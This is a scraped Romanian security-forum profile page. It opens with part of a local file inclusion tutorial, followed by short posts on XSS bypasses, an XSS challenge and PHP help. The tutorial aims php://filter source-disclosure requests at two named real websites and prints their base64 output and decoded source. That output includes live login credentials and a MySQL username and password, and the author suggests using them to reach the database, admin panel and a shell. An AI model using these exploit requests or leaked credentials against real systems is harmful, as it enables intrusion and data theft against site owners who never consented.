style="background-image:url(gfx/unterheader.jpg); background-repeat:no-repeat" valign=top> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <!-- newsheader ---> <td width=400 height=71 valign="bottom"> <table id="ueber"> <tr> <td width=190> </td> <td width=210> News </td> </tr> </table> </td> <!-- ueberschrift des jeweiligen inhaltes --> <td width=590 align="left" valign="bottom"> <table id="ueber"> <tr> <td width=30> </td> <td width=560> <?php include("ueberschriften.php"); ?> </td> </tr> </table> </td> </tr> <tr> <!-- news ---> <td width=400 valign="top"> <!-- an dieser stelle php aus datenbank--> <table> <tr> <td valign="top"> <?php include("news.php") ?> </td> </tr> </table> </td> <!-- jeweiliger inhalt --> <td width=590 valign="top"> <table width=590 id="main"> <tr> <td width=45> </td> <td valign="top" width=560> <?php If (strpos($_REQUEST["page"], "http") === 0 || strpos($_REQUEST["page"], "http") > 0) { $page="home.php"; }; If (strpos($_REQUEST["page"], "www") === 0 || strpos($_REQUEST["page"], "www") > 0) { $page="home.php"; }; If (strpos($_REQUEST["page"], "ftp") === 0 || strpos($_REQUEST["page"], "ftp") > 0) { $page="home.php"; }; If ($page) { include($page); } else { include("home.php"); } ?> </td> </tr> </table> </td> </tr> </table> </td> </tr> In sursa vedem instructiunea urmatoare: include('user.php'); Acum vom citi pagina user.phphttp://www.bodyworld-schkeuditz.de/index.php?page=php://filter/convert.base64-encode/resource=user.php Ce am obtinut: PD9waHANCg0KICAkdXNlciA9ICJjYW1pYmIiOw0KICAkcGFzcyA9ICJjYW1pYmIiDQoNCg0K Decodat : $user = "camibb"; $pass = "camibb" Intram in pagina login.php si ne logam cu datele de mai sus (Nu se poate face mare lucru doar pentru concept). Un alt exemplu:Impresariat Alwernia - Andrzej Grabowski Show http://s17.postimg.org/9q9g8rn7z/lfi6.png Vom citi index.php http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://s27.postimg.org/5hgc3dkg3/lfi7.png Ce am obtinut : PGhlYWQ+DQo8VElUTEU+SW1wcmVzYXJpYXQgQWx3ZXJuaWEgLSBBbmRyemVqIEdyYWJvd3NraSBTaG93PC9USVRMRT4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTIiPg0KPE1FVEEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCxmb2xsb3csYWxsIj4NCjxNRVRBIG5hbWU9InJldmlzaXQtYWZ0ZXIiIGNvbnRlbnQ9IjIgZGF5cyI+DQo8TUVUQSBuYW1lPSJ0aXRsZSIgY29udGVudD0iSW1wcmVzYXJpYXQgQWx3ZXJuaWEgLSBBbmRyemVqIEdyYWJvd3NraSBTaG93Ij4NCjxNRVRBIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJHcmFib3dza2ksIEltcHJlc2FyaWF0IEFsd2VybmlhLCBBbmRyemVqIEdyYWJvd3NraSBTaG93LCBBbHdlcm5pYSwgU2NlbmFyaXVzeiBkbGEgMyBha3RvcvN3LCBLd2FydGV0IGRsYSA0IGFrdG9y83csIFNjaGFlZmZlciBCb2d1c7NhdywgQWdlbmNqYSBJbXByZXNhcnlqbmEsIEFnZW5jamEgQXJ0eXN0eWN6bmEsICBBZ2VuY2phIFRlYXRyYWxuby1Lb25jZXJ0b3dhIj48IS0tIEFsd2VybmlhLCBHcmFib3dza2kgLS0+DQo8TUVUQSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iQW5kcnplaiBHcmFib3dza2kgU2hvdyAtIEdyYWJvd3NjeS5Db20uIEFnZW5jamEgaW1wcmVzYXJ5am5hIEFsd2VybmlhLiBUeWxrbyBuYWpsZXBzemUgc3Bla3Rha2xlLiBJbXByZXNhcmlhdCBBbHdlcm5pYSAtIEFuZHJ6ZWogR3JhYm93c2tpIFNob3ciPjwhLS0gQWx3ZXJuaWEsIEdyYWJvd3NraSAtLT4NCjxNRVRBIG5hbWU9ImFic3RyYWN0IiBjb250ZW50PSJHcmFib3dza2ksIEltcHJlc2FyaWF0IEFsd2VybmlhLCBBbmRyemVqIEdyYWJvd3NraSBTaG93LCBBbHdlcm5pYSwgU2NlbmFyaXVzeiBkbGEgMyBha3RvcvN3LCBLd2FydGV0IGRsYSA0IGFrdG9y83csIFNjaGFlZmZlciBCb2d1c7NhdywgQWdlbmNqYSBJbXByZXNhcnlqbmEsIEFnZW5jamEgQXJ0eXN0eWN6bmEsICBBZ2VuY2phIFRlYXRyYWxuby1Lb25jZXJ0b3dhIj4NCjxNRVRBIG5hbWU9ImF1dGhvciIgY29udGVudD0iR3JhYm93c2tpLCBJbXByZXNhcmlhdCBBbHdlcm5pYSwgQW5kcnplaiBHcmFib3dza2kgU2hvdywgQWx3ZXJuaWEsIFNjZW5hcml1c3ogZGxhIDMgYWt0b3LzdywgS3dhcnRldCBkbGEgNCBha3RvcvN3LCBTY2hhZWZmZXIgQm9ndXOzYXcsIEFnZW5jamEgSW1wcmVzYXJ5am5hLCBBZ2VuY2phIEFydHlzdHljem5hLCAgQWdlbmNqYSBUZWF0cmFsbm8tS29uY2VydG93YSI+DQo8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LUxhbmd1YWdlIiBDT05URU5UPSJwbCI+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiIHNyYz0ianMvc2tyeXB0LmpzIj48L3NjcmlwdD4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQoNCjwhLS0NCmJvZHkgew0KDQoJYmFja2dyb3VuZC1jb2xvcjogIzM1NUM5MTsNCg0KCW1hcmdpbi1sZWZ0OiAwcHg7DQoNCgltYXJnaW4tdG9wOiAwcHg7DQoNCgltYXJnaW4tcmlnaHQ6IDBweDsNCg0KCW1hcmdpbi1ib3R0b206IDBweDsNCg0KfQ0KDQoNCg0KLS0+DQoNCjwvc3R5bGU+PC9oZWFkPiANCg0KPGJvZHk+DQoNCjx0YWJsZSBjbGFzcz0idGFiZWxhemV3bmV0cnpuYSIgYm9yZGVyPTAgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPiANCg0KPHRyPiANCg0KCTx0ZD4gDQoNCgkJPFRBQkxFIGJvcmRlcj0wIGNsYXNzPSJ0YWJlbGF3ZXduZXRyem5hIiBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTA+IA0KDQoJCTxUUj4gDQoNCgkJCTxURCBjb2xzcGFuPSIzIj48P2luY2x1ZGUoImhlYWRlcl9jZW50ZXIuaHRtIik/PjwvVEQ+IA0KDQoJCTwvVFI+IA0KDQoJCTxUUj4NCg0KCQkgICA8dGQgY2xhc3M9ImxlZnRiYWNrZ3JvdW5kIiB2YWxpZ249InRvcCI+PD9pbmNsdWRlKCJsZWZ0Lmh0bSIpPz48L1REPiANCg0KCQkgICA8dGQgY2xhc3M9ImNlbnRlciIgdmFsaWduPSJ0b3AiPg0KDQogICAgICAgICAgICA8PyANCg0KDQoNCiAgICAgICAgICAgICAgIC8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiAgICAgICAgICAgICAgIHJlcXVpcmVfb25jZSAoImFkbWluL2RhdGFfYmFzZS5jbGFzcyIpOw0KDQogICAgICAgICAgICAgICAkY29ubmlkID0gbmV3IERhdGFCYXNlQ29ubmVjdCgpOw0KDQogICAgICAgICAgICAgICAvLyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQoNCg0KICAgICAgICAgICAgICAgaW5jbHVkZSAoJ25ld3N5L2VuZ2luZS5waHAzJyk7DQoNCg0KDQogICAgICAgICAgICAgICAkcGFnZSAgICA9ICRfR0VUWydwYWdlJ107DQoNCiAgICAgICAgICAgICAgICRzdWJwYWdlID0gJF9HRVRbJ3N1YnBhZ2UnXTsNCg0KICAgICAgICAgICAgICAgJHBhcmVudCAgPSAkX0dFVFsncGFyZW50J107DQoNCiAgICAgICAgICAgICAgICRwaWQgICAgID0gJF9HRVRbJ3BpZCddOw0KDQoNCg0KICAgICAgICAgICAgICAgaWYgKCEkcGFnZSkgDQoNCiAgICAgICAgICAgICAgICAgIGluY2x1ZGUgKCdjZW50ZXIuaHRtJyk7DQoNCiAgICAgICAgICAgICAgIGVsc2UNCg0KICAgICAgICAgICAgICAgaWYgKCRwYWdlID09ICduZXdzeScgJiYgJHN1YnBhZ2UgPT0gJ3Nob3dhbGwnKQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgnbmV3c3kvbmV3c3kucGhwMycpOw0KDQogICAgICAgICAgICAgICBlbHNlDQoNCiAgICAgICAgICAgICAgIGlmICgkcGFnZSA9PSAnbmV3c3knICYmICRzdWJwYWdlID09ICdzaG93JykNCg0KICAgICAgICAgICAgICAgICAgaW5jbHVkZSAoJ25ld3N5L25ld3MucGhwMycpOw0KICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgaWYgKCRwYWdlID09ICdzdHJvbmEnKQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgnbmV3c3kvc3Ryb25hLnBocDMnKTsNCiAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgZWxzZQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgkcGFnZSk7DQoNCg0KDQogICAgICAgICAgICA/Pg0KDQogICAgICAgICA8L3RkPg0KDQoJCSAgIDx0ZCBjbGFzcz0icmlnaHRiYWNrZ3JvdW5kIiB2YWxpZ249InRvcCI+PD9pbmNsdWRlKCJuZXdzeS9wb2xlY2FteS5waHAzIik/PjwvVEQ+DQoNCgkJPC9UUj4NCg0KCQk8VFI+DQoNCgkJCTx0ZCBjbGFzcz0iZm9vdGVyYmFja2dyb3VuZGxlZnQiPjw/aW5jbHVkZSgiZm9vdGVyX2xlZnQuaHRtIik/PjwvVEQ+IA0KDQoJCQk8dGQgY2xhc3M9ImZvb3RlcmJhY2tncm91bmQiPjw/aW5jbHVkZSgiZm9vdGVyX2NlbnRlci5odG0iKT8+PC9URD4gDQoNCgkJCTx0ZCBjbGFzcz0iZm9vdGVyYmFja2dyb3VuZHJpZ2h0Ij48P2luY2x1ZGUoImZvb3Rlcl9yaWdodC5odG0iKT8+PC9URD4gDQoNCgkJPC9UUj4NCg0KCQk8L3RhYmxlPg0KDQoJPC90ZD4NCg0KPC90cj4NCg0KPC90YWJsZT4NCg0KPC9ib2R5Pg0KPC9odG1sPg== Decodat: <head> <TITLE>Impresariat Alwernia - Andrzej Grabowski Show</TITLE> <meta http-equiv="content-type" content="text/html; charset=iso-8859-2"> <META name="robots" content="index,follow,all"> <META name="revisit-after" content="2 days"> <META name="title" content="Impresariat Alwernia - Andrzej Grabowski Show"> <META name="keywords" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"><!-- Alwernia, Grabowski --> <META name="description" content="Andrzej Grabowski Show - Grabowscy.Com. Agencja impresaryjna Alwernia. Tylko najlepsze spektakle. Impresariat Alwernia - Andrzej Grabowski Show"><!-- Alwernia, Grabowski --> <META name="abstract" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"> <META name="author" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"> <META HTTP-EQUIV="Content-Language" CONTENT="pl"> <script language="JavaScript" src="js/skrypt.js"></script> <style type="text/css"> <!-- body { background-color: #355C91; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style></head> <body> <table class="tabelazewnetrzna" border=0 cellpadding=0 cellspacing=0> <tr> <td> <TABLE border=0 class="tabelawewnetrzna" cellpadding=0 cellspacing=0> <TR> <TD colspan="3"><?include("header_center.htm")?></TD> </TR> <TR> <td class="leftbackground" valign="top"><?include("left.htm")?></TD> <td class="center" valign="top"> <? // ----------------------------------------------------------------------------------------------------------------------------------------------------- require_once ("admin/data_base.class"); $connid = new DataBaseConnect(); // ----------------------------------------------------------------------------------------------------------------------------------------------------- include ('newsy/engine.php3'); $page = $_GET['page']; $subpage = $_GET['subpage']; $parent = $_GET['parent']; $pid = $_GET['pid']; if (!$page) include ('center.htm'); else if ($page == 'newsy' && $subpage == 'showall') include ('newsy/newsy.php3'); else if ($page == 'newsy' && $subpage == 'show') include ('newsy/news.php3'); else if ($page == 'strona') include ('newsy/strona.php3'); else include ($page); ?> </td> <td class="rightbackground" valign="top"><?include("newsy/polecamy.php3")?></TD> </TR> <TR> <td class="footerbackgroundleft"><?include("footer_left.htm")?></TD> <td class="footerbackground"><?include("footer_center.htm")?></TD> <td class="footerbackgroundright"><?include("footer_right.htm")?></TD> </TR> </table> </td> </tr> </table> </body> </html> Ce este interesant in pagina sursa este admin/data_base.class si ii vom citi sursa http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=admin/data_base.class De acolo am obtinut : PD8NCmNsYXNzIERhdGFCYXNlQ29ubmVjdA0Kew0KICAgdmFyICRteXNxbGlkY29ubjsNCiAgIHZhciAkZGF0YWJhc2VuYW1lOw0KICAgdmFyICRyZXN1bHRzOw0KICAgdmFyICR0YWJsZW5hbWU7DQoNCiAgIGZ1bmN0aW9uIERhdGFCYXNlQ29ubmVjdCgpDQogICB7DQovLyAgICAgICRteXNxbF9ob3N0ID0gImxvY2FsaG9zdCI7DQovLyAgICAgICRteXNxbF91c2VyID0gInJvb3QiOw0KLy8gICAgICAkbXlzcWxfcGFzcyA9ICIiOw0KDQogICAgICAkbXlzcWxfaG9zdCA9ICJsb2NhbGhvc3QiOw0KICAgICAgJG15c3FsX3VzZXIgPSAiZ3JhYm93c2N5IjsNCiAgICAgICRteXNxbF9wYXNzID0gInFISW5KaTRvIjsNCg0KICAgICAgJG15c3FsX2RiX25hbWUgPSAiZ3JhYm93c2N5IjsNCiAgICAgICRuYXp3YV90YWJlbGkgPSAgImdyYWJvd3NjeV8iOw0KDQogICAgICAkaWRfY29ubiA9IEBteXNxbF9jb25uZWN0KCRteXNxbF9ob3N0LCRteXNxbF91c2VyLCRteXNxbF9wYXNzKSBvcg0KICAgICAgICAgZGllKCc8c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IFZlcmRhbmE7IGZvbnQtc2l6ZTogMTNweCI+PGI+UHJvYmxlbSB6IGRvc3TqcGVtIGRvIHNlcndlcmEgYmF6eSBkYW55Y2g8L2I+Jyk7DQogICAgICBAbXlzcWxfc2VsZWN0X2RiKCRteXNxbF9kYl9uYW1lKSBvcg0KICAgICAgICAgZGllKCc8c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IFZlcmRhbmE7IGZvbnQtc2l6ZTogMTNweCI+PGI+UHJvYmxlbSB6IGRvc3TqcGVtIGRvIGJhenkgZGFueWNoLjwvYj4nKTsNCg0KICAgICAgJHRoaXMgLT4gbXlzcWxpZGNvbm4gPSAkaWRfY29ubjsNCiAgICAgICR0aGlzIC0+IGRhdGFiYXNlbmFtZSA9ICRteXNxbF9kYl9uYW1lOw0KICAgICAgJHRoaXMgLT4gdGFibGVuYW1lID0gJG5hendhX3RhYmVsaTsNCiAgIH0NCg0KICAgZnVuY3Rpb24gQ2hlY2tUYWJsZUV4aXN0cygkdGFibGUpDQogICB7DQogICAgICAgJHRoaXMtPnJlc3VsdHMgPSBteXNxbF9kYl9xdWVyeSgkdGhpcy0+ZGF0YWJhc2VuYW1lLCAiU0VMRUNUIDEgRlJPTSBgJHRhYmxlYCBMSU1JVCAwIiwgJHRoaXMtPm15c3FsaWRjb25uKTsNCiAgICAgICByZXR1cm4gJHRoaXMtPnJlc3VsdHM7DQogICB9DQoNCiAgIGZ1bmN0aW9uIFF1ZXJ5VG9EYXRhQmFzZSgkcXVlcnkpDQogICB7DQogICAgICAgJHRoaXMtPnJlc3VsdHMgPSBteXNxbF9xdWVyeSgkcXVlcnkpIG9yDQogICAgICAgICAgZGllKCJQcm9ibGVtIHogZG9zdOpwZW0gZG8gYmF6eSBkYW55Y2guICIuJHF1ZXJ5KTsNCiAgICAgICByZXR1cm4gJHRoaXMtPnJlc3VsdHM7DQogICB9DQoNCn0NCj8+DQo= Decodat: <? class DataBaseConnect { var $mysqlidconn; var $databasename; var $results; var $tablename; function DataBaseConnect() { // $mysql_host = "localhost"; // $mysql_user = "root"; // $mysql_pass = ""; $mysql_host = "localhost"; $mysql_user = "grabowscy"; $mysql_pass = "qHInJi4o"; $mysql_db_name = "grabowscy"; $nazwa_tabeli = "grabowscy_"; $id_conn = @Mysql_select_db($mysql_db_name) or die('<span style="font-family: Verdana; font-size: 13px"><b>Problem z dostêpem do bazy danych.</b>'); $this -> mysqlidconn = $id_conn; $this -> databasename = $mysql_db_name; $this -> tablename = $nazwa_tabeli; } function CheckTableExists($table) { $this->results = mysql_db_query($this->databasename, "SELECT 1 FROM `$table` LIMIT 0", $this->mysqlidconn); return $this->results; } function QueryToDataBase($query) { $this->results = mysql_query($query) or die("Problem z dostêpem do bazy danych. ".$query); return $this->results; } } ?> si voala : $mysql_user = "grabowscy"; $mysql_pass = "qHInJi4o"; $mysql_db_name = "grabowscy"; De aici puteti obtine acces la baza de date ,sa luam acces la panou de adminitrare si shell:D. Aceste exemple au fost date doar pentru a demonstra impactul vurnarabilitati. Cam atat am avut de spus sper sa va fi fost de folos tutorialul. O zi buna:D.
  8. dancezar
    cam auirea scris "unde puteti gasi parolele in afara de /etc/passwd ar cam fi:" etc/passwd nu are parole . apoi ai uitat sa spui de null byte %00 cand scriptul iti pune .php la urma . Si unde is metodele php://input si php://filter ?
  9. dancezar
    Na ca plus ca poate crea si probleme la % il inlocuieste cu NULL ,spre exemplu ai o pagina de login si prin GET ai o var care il trimite catre o pagina dupa ce se logheza,si valoarea o pastezi intr-un input hidden.Logic ar fi sa scoti htmlentities si sa filtrezi cuvantul javascript: cu case sensitive si urldecode ca sa eviti xss-ul,daca folosesti "scriptul" tau de protectie inpotriva xss poti face bypass cu bypass-u cum ar veni java%script:alert(1); scriptul tau v-a inlocui % cu NULL si stringul tau va returna outputul asta javascript:alert(1); cea ce nu e bine .Ar trebui sa inlocuiesti % cu - sau cu altceva
  10. dancezar
    Leaga si tu scriptu la un db si sa vedem
  11. dancezar
    Steganography - Wikipedia, the free encyclopedia
  12. dancezar
    In cat timp ti-au raspuns? la mine m-au tinut de o luna ba ca sa le trimit prin formu de bugbouny ba sa le urc video-ul pe youtube si nici acuma nu am un raspuns.
  13. dancezar
    //Da a fost la misto
  14. dancezar
    atunci incerca in loc de $_SERVER['REMOTE_ADDR'] pune $_SERVER["HTTP_CF_CONNECTING_IP"]
  15. dancezar
    $name=$_REQUEST['name']."--".$_SERVER['REMOTE_ADDR']; si vei primi prin mail ceva de genu numele--ip sau la subject $subject="Message sent using your contact form--".$_SERVER['REMOTE_ADDR'];
  16. dancezar
    Am cam exagerat este cam de Mediu spre HARD , Toshib4 l-a rezolvat in timpul asta pentru ca este priceput(apropo bravo:D) //am editat titlul
  17. dancezar
    Target : hxxp://www.musicsrc.com/search.php?query= Reguli : -Injectati vectorul xss numai in linkul indicat alta locatie nu este permisa -Trimiteti sintaxa prin PM -Nu divulgati rezolvarea Proof: http://s7.postimg.org/w65m8ip63/xss_challenge.png Solveri: -Toshib4 -askwrite - -
  18. dancezar
    Pai depinde sunt unele persoane care au acelasi parola peste tot.
  19. dancezar

    Cu ce sa incep...

    dancezar replied to cAm's topic in Programare

    html+css+photoshop=vei fi capabil sa faci template-uri html statice html+css+javascript(eventual jquery)+photoshop=vei fi capabil sa faci template-uri HTML dinamice cu animatii si prostii html+css+javascript+php+photoshop=vei fi capabil sa faci template-uri care implica si cod php eventual teme wordpress apoi poti sa iti actualizezi cunostintele trecand de la html->html5 apoi de la css->css3 daca incepi direct cu ele nai sa intelegi nimic.
  20. dancezar
    sunt foarte multe indicii plus ca a ingrosat.te folosesti de Protect your critical passwords with strong encryption online. si acolo ai tot ce iti trebuie //te-a luat putin peste picior pentru ca ti-a dat mura in gura trebuia sa faci putina cercetare pe google si aia era si in general majoritatea care cauta ajutor pe rst cauta ceva in genul "te duci acolo,vezi aia dai click acolo apoi blabalablbla" cand ai cea mai mare enciclopedie la dispozitie GOOGLE (acuma trebuie sa stii sa cauti)
  21. dancezar
    Protect your critical passwords with strong encryption online.
  22. dancezar
    am facut problema trimitemi pm cu rezolvarea ta si apoi am sa ti-o trimit pe a mea
  23. dancezar
    Parca amenda nu a fost destula au mai luat si bataie ,ce sa faci prostia doare. //Daca erau baieti destepti acuma erau cu banii in buzunar si fetele la locul lor
  24. dancezar
    http://s8.postimg.org/heaqe1g11/sqli_renegade2.png ms ai pm
  25. dancezar
    nu neaparat in while merge si in for ,incerc si eu acuma // o singura nelamurire deci rezervoru ii permite sa merga n kilometri ,trebuie sa citesc si distanta in km de la A la B
×
×
  • Create New...